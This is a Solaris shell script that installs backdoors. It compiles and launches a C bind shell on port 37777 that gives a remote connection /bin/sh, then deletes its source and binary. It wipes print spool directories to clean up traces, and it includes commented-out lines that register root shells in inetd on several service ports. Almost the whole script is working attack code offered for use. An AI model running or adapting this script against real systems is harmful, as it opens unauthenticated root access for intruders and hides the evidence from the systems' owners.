#!/bin/sh

PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/ucb:/usr/local/bin:/usr/local/sbin\
:/usr/xpg4/bin ; export PATH

cd /tmp

# A backdoor on a Solaris ephemeral port. We don't fork, so it dies when you're
# done...

#CC=gcc
CC=cc

cat > shell.c << __EOF__
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int
main(int argc, char **argv)
{
    int sd, cd;
    unsigned short port;
    struct sockaddr_in saddr;

    if(argc < 2) exit(EXIT_FAILURE);
    port = (unsigned short) strtoul(argv[1], NULL, 0);
    memset(&saddr, 0, sizeof saddr);
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(port);
    saddr.sin_addr.s_addr = htonl(INADDR_ANY);
    sd = socket(AF_INET, SOCK_STREAM, 0);
    bind(sd, (struct sockaddr *) &saddr, sizeof saddr);
    listen(sd, 1);
    cd = accept(sd, NULL, NULL);
    dup2(cd, STDIN_FILENO);
    dup2(cd, STDOUT_FILENO);
    dup2(cd, STDERR_FILENO);	
    execl("/bin/sh", "sh", (char *) 0);
    exit(0);
}
__EOF__

$CC -o shell shell.c -lsocket
./shell 37777 &
rm -f shell.c shell

# Minor cleaning...

rm -rf /var/spool/lp/tmp/*
rm -rf /var/spool/lp/requests/*

# Some inetd backdoors. Uncomment wisely... 

#rm -f x
#echo "ingreslock stream tcp nowait root /bin/sh sh -i" >> x 	
#echo "courier stream tcp nowait root /bin/sh sh -i"    >> x
#echo "ftp-data stream tcp nowait root /bin/sh sh -i"   >> x
#echo "domain stream tcp nowait root /bin/sh sh -i"     >> x
#echo "printer stream tcp nowait root /bin/sh sh -i"    >> x
#inetd -s x
#rm -f x 

